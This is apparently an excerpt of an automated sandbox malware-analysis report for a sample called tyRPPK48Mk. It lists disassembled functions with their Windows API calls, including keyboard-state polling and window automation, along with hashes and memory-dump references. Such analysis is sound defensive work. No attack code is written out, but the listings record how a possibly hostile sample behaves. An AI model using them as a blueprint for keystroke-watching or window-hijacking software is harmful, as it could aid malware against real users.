                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295938435-8599901
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1834419854-3405671355
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 00454074
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 455036304-4153970271
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2170234536-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 136442275-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00467793
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3104067586-3081909835
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
